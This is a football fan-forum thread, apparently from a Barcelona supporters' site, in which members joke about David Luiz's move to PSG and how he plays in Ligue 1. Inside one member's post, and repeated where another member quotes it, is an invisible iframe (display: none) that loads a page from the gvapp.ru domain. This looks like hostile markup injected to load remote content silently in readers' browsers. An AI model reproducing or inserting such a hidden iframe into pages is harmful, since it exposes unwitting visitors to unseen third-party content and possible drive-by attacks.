David Luiz

CatalinR10

David Luiz (PSG): "I didn't have doubts from the moment PSG contacted me. I'm sure I'll be happier here than at Barça or Bayern." [tf1]

sheldon.gif

F

Flavia

David Luiz (PSG): "I didn't have doubts from the moment PSG contacted me. I'm sure I'll be happier here than at Barça or Bayern." [tf1]

Hahaha. Surely all Barça and bayern fans are also happy about that. We can't say the same about psg supporters. Bertus doesn't seem happy about him :lucho2:
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Behrox

Vice President of FC Barcelona
Hahaha. Surely all Barça and bayern fans are also happy about that. We can't say the same about psg supporters. Bertus doesn't seem happy about him :lucho2:
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Oh I almost forgot. @Bertus when is your next game I can't wait to see the Luiz-Marcos pairing

Sid90

This clown makes Pique look like the greatest defender to walk on planet earth, so happy barca didn't buy him from chelski. We should build a statue of Zubi in front of Camp Nou to mark his achievement of not buying SIDE SHOW BOB.

Bertus

Oh I almost forgot. @Bertus when is your next game I can't wait to see the Luiz-Marcos pairing

On sunday.

And so far the pairing does good. Especially DL. It's like the french league is too easy for him. He manages to stop attackers while walking 90% of the time and with almost no challenge. That does say it all about the quality of the frontlines in the league :facepalm:

Behrox

Vice President of FC Barcelona
On sunday.

And so far the pairing does good. Especially DL. It's like the french league is too easy for him. He manages to stop attackers while walking 90% of the time and with almost no challenge. That does say it all about the quality of the frontlines in the league :facepalm:

guess I'll have to wait for a CL match

Home of Barca Fans